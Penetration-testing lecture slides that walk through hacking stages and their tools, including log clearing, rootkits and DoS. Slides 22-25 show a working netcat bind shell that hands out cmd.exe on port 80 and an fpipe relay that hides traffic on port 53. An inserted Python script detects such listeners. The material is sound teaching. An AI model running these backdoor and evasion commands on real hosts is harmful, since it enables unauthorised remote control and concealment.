Posted on 21-Dec-2015
Slide 1 (cs691 chow): Penetration Testing, C. Edward Chow

Slide 2: Outline of the Talk
Definition and concepts of penetration testing/hacking
Anatomy of a hack
Framework for penetration studies
Skills and requirements of a penetration tester
SANS list of security holes
Internet penetration
Dial-up penetration
Internal penetration
References:
Chapter 23, Vulnerability Analysis, by Matt Bishop.
Hack I.T.: Security Through Penetration Testing, by T.J. Klevinsky, Scott Laliberte, Ajay Gupta.
Hacking Exposed, by Stuart McClure, Joel Scambray and George Kurtz, http://www.hackingexposed.com/win2k/links.html
Slide 3: Definition
Vulnerability (security flaw): a specific failure of the system to guard against unauthorized access or actions. It can be in procedures, technology (software or hardware), or management.
Using the failure of the system to violate the site security policy is called exploiting the vulnerability.
A penetration study is a test for evaluating the strength of all security controls on the computer system. It intends to find all possible security holes and provides suggestions for fixing them.
Penetration testing is an authorized attempt to violate specific constraints stated in the form of a security or integrity policy.
Penetration testing is a testing technique for discovering, understanding, and documenting all the security holes that can be found in a system.
It is not a proof technique. It can never prove the absence of security flaws; it can only prove their presence.
Example goals of penetration studies are gaining read or write access to specific objects, files, or accounts; gaining specific privileges; and disrupting or denying the availability of objects.
What is the difference between penetration testing and hacking/intrusion?
Slide 4: More Thorough Penetration Study
A more thorough penetration study finds the proper interpretation of the vulnerabilities found and draws conclusions about the care taken in the design and implementation.
A simple list of vulnerabilities, although helpful in closing those specific holes, contributes far less to the security of a system.
In practice, constraints (resources, money, time) affect the penetration study.
Slide 5: Hacking Methodology (Steps)
An excellent description is inside the back cover page of the "Hacking Exposed" text by McClure et al. Each step with the tools typically used:
Footprinting: whois, nslookup
Scanning: Nmap, fping
Enumeration: DumpACL, showmount, legion, rpcinfo
Gaining Access: tcpdump, L0phtcrack, NAT
Escalating Privilege: John the Ripper, getadmin
Pilfering: rhosts, user data, config files, registry
Covering Tracks: zap, rootkits
Creating Back Doors: cron, at, startup folder, netcat, keystroke logger, remote desktop
Denial of Service: Synk4, ping of death, TFN/stacheldraht
Slide 6: Footprinting
Information gathering. Sam Spade is a Windows-based network query tool. Find out the target IP address and phone number ranges. Why check phone numbers? Namespace acquisition. Network topology (VisualRoute). It is essential to a "surgical" attack. The key here is not to miss any details. Note that for a penetration tester, this step is to avoid testing others instead of your client and to include all systems to be tested (sometimes the organization will not tell you what their systems consist of).
Defense: deploy a NIDS (snort), RotoRouter.
Techniques: open source search; find the domain name, admin, IP addresses and name servers; DNS zone transfer.
Tools: Google and other search engines, Edgar; whois (Network Solutions; ARIN); nslookup (ls -d), dig, Sam Spade.
Slide 7: Scanning
Bulk target assessment: which machines are up and what ports (services) are open. Focus on the most promising avenues of entry. To avoid being detected, these tools can reduce the frequency of packet sending and randomize the order of the ports or IP addresses to be scanned.
Note that some machines do not respond to ping but respond to requests to ports that are actually open. Ardor is an example.
Techniques: ping sweep; TCP/UDP port scan; OS detection.
Tools: fping, icmpenum, WS_Ping ProPack; nmap, SuperScan, fscan; nmap, queso, siphon.
Slide 8: Enumeration
Identify valid user accounts or poorly protected resource shares. This is more intrusive probing than the scanning step.
Techniques: list user accounts; list file shares; identify applications.
Tools: null sessions, DumpACL, sid2user, onSiteAdmin; showmount, NAT, legion; banner grabbing with telnet or netcat, rpcinfo.
Slide 9: Gaining Access
Based on the information gathered so far, make an informed attempt to access the target.
Techniques: password eavesdropping; file share brute forcing; password file grab; buffer overflow.
Tools: tcpdump/ssldump, L0phtcrack readsmb; NAT, legion; tftp, pwdump2 (NT); ttdb, bind, IIS .HTR/ISM.DLL.
Slide 10: Escalating Privilege
If only user-level access was obtained in the last step, seek to gain complete control of the system.
Techniques: password cracking; known exploits.
Tools: John the Ripper, L0phtcrack; lc_messages, getadmin, sechole.
Slide 11: Pilfering
Webster's Revised Unabridged Dictionary (1913): Pilfer \Pil"fer\, v. i. [imp. & p. p. Pilfered; p. pr. & vb. n. Pilfering.] [OF. pelfrer. See Pelf.] To steal in small quantities, or articles of small value; to practice petty theft.
Gather information to identify mechanisms that allow access to trusted systems.
Techniques: evaluate trusts; search for cleartext passwords.
Tools: rhosts, LSA secrets; user data, configuration files, registry.
Slide 12: Covering Tracks
Once total ownership of the target is secured, hiding this fact from system administrators becomes paramount, lest they quickly end the romp.
Techniques: clear logs; hide tools.
Tools: zap, Event Log GUI; rootkits, file streaming.
Slide 13: Creating Back Doors
Trap doors will be laid in various parts of the system to ensure that privileged access is easily regained whenever the intruder decides.
Techniques: create rogue user accounts; schedule batch jobs; infect startup files.
Tools: members of wheel, admin; cron, AT; rc, startup folder, registry keys.
Techniques: plant remote control services; install monitoring mechanisms; replace applications with Trojans.
Tools: netcat, remote.exe, VNC, BO2K, remote desktop; keystroke loggers, add an account to the secadmin mail aliases; login, fpnwclnt.dll.
Slide 14: Denial of Service
If the attacker is unsuccessful in gaining access, they may use readily available exploit code to disable a target as a last resort.
Techniques: SYN flood; ICMP techniques; identical src/dst SYN requests.
Tools: synk4; ping of death, smurf; land, latierra.
Techniques: overlapping fragment/offset bugs; out-of-bounds TCP options (OOB); DDoS.
Tools: trinoo, TFN, stacheldraht.
Slide 15: Nessus: Integrated Security Scanning Tool
Originally designed by Renaud Deraison. Available at www.nessus.org. The main scanning engine runs on a Unix server, with the client GUI running on Unix or Windows. Pretty good control and reporting. It includes a scripting language for plug-ins (detecting additional attacks). http://www.nessus.org/pres/bh2001/index.html
Slide 22: Setting up a Backdoor Connection
Once you obtain admin privilege, you install tools that allow you to run commands remotely (e.g. netcat) or use the machine as a stepping stone for relaying or redirecting messages (fpipe).
Port redirection accepts packets on one port and sends them out over another port. It can be used to get past a packet-filtering firewall.
We will use netcat and fpipe to illustrate the concept. Netcat is available at http://www.atstake.com/research/tools/network_utilities/ and fpipe is available at http://www.foundstone.com
Slide 23: Setup Netcat
C:\work\cucs\cs522\project>c:\work\software\security\nc\nc -v -L -e cmd.exe -p 80 -s 128.198.177.63
listening on [128.198.177.63] 80 ...
connect to [128.198.177.63] from VIVIAN.eas.uccs.edu
listening on [128.198.177.63] 80 ...
connect to [128.198.177.63] from VIVIAN.eas.uccs.edu
Here we bind to port 80. You can also use port 139. The idea is to use a known port to avoid detection. -L is used to repeat the previous command after the connection is terminated. The nc command will receive commands from packets arriving at port 80, run them with cmd.exe, and send back the execution result.
Slide 24: Setup FPIPE
C:\work\software\security\fpipe>fpipe -l 53 -s 53 -r 80 128.198.177.63
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com
Pipe connected:
In: 128.198.162.60:58797 --> 128.198.177.63:53
Out: 128.198.168.63:53 --> 128.198.177.63:80
Pipe connected:
In: 128.198.162.60:58801 --> 128.198.177.63:53
Out: 128.198.177.63:53 --> 128.198.177.63:80
Here the fpipe program listens for packets coming from blanca to port 53 and relays them to port 80 on 128.198.177.63, using port 53 (DNS) to avoid detection.
Slide 25: Telnet to the relay host
[cs691@blanca cs691]$ telnet 128.198.168.63 53
Trying 128.198.168.63...
Connected to vivian (128.198.168.63).
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\work\cucs\cs522\project>dir
dir
 Volume in drive C is S3A1203D501
 Volume Serial Number is 503B-9F00
 Directory of C:\work\cucs\cs522\project
04/29/2003 12:56 PM <DIR> .
04/29/2003 12:56 PM <DIR> ..
04/29/2003 12:50 PM 371,208 erniestInfocom2000.ps
04/29/2003 12:52 PM 204,590 ernstInfocom2000.pdf
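A defender's check for the pattern the netcat and fpipe slides demonstrate, added here as an example and not part of the original slides: it parses constructed netstat -ano style output together with a constructed PID-to-image map and flags listeners on well-known ports (53, 80, 139, 443) whose owning program is not the expected service. The allow-list of expected owners is an assumption for this example.

```python
"""Added detection example (not from the original slides): find listening
sockets on well-known ports that are owned by an unexpected program, the
footprint left by 'nc -L -e cmd.exe -p 80' and 'fpipe -l 53 -s 53 -r 80'.
Input is constructed 'netstat -ano'-style text plus a constructed PID map."""
import re

# Well-known ports and the image names a defender expects to own them
# (constructed allow-list; tune it to the host being checked).
EXPECTED_OWNER = {
    53: {"named", "dns.exe"},
    80: {"httpd", "inetinfo.exe"},
    139: {"System"},
    443: {"httpd", "inetinfo.exe"},
}

NETSTAT_LINE = re.compile(
    r"^\s*TCP\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+LISTENING\s+(?P<pid>\d+)\s*$"
)

def parse_listeners(netstat_output):
    """Return [(local_addr, port, pid)] for every TCP LISTENING row."""
    listeners = []
    for line in netstat_output.splitlines():
        m = NETSTAT_LINE.match(line)
        if m:
            listeners.append((m["addr"], int(m["port"]), int(m["pid"])))
    return listeners

def find_suspicious_listeners(netstat_output, pid_to_image):
    """Listeners on a well-known port whose owning image is not allow-listed.
    Each hit is (port, pid, image)."""
    hits = []
    for _addr, port, pid in parse_listeners(netstat_output):
        expected = EXPECTED_OWNER.get(port)
        if expected is None:
            continue  # not a port this check cares about
        image = pid_to_image.get(pid, "<unknown>")
        if image not in expected:
            hits.append((port, pid, image))
    return hits

# Constructed sample: a host running the netcat and fpipe listeners from the
# slides alongside legitimate services.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    128.198.177.63:80      0.0.0.0:0              LISTENING       1844
  TCP    128.198.177.63:53      0.0.0.0:0              LISTENING       2012
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       1120
  TCP    128.198.177.63:80      128.198.162.60:58797   ESTABLISHED     1844
"""
SAMPLE_PIDS = {1844: "nc.exe", 2012: "fpipe.exe", 4: "System", 1120: "inetinfo.exe"}

if __name__ == "__main__":
    for port, pid, image in find_suspicious_listeners(SAMPLE_NETSTAT, SAMPLE_PIDS):
        print(f"port {port} owned by {image} (pid {pid}) is not an expected service")
```

On a real host the same logic pairs the output of netstat -ano with tasklist (or ps on Unix); a hit on port 53 or 80 owned by nc.exe or fpipe.exe is exactly the relay set up on the previous slides.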
Slide 26: Layering of Tests
1. External attacker with no knowledge of the system.
2. External attacker with access to the system.
3. Internal attacker with access to the system.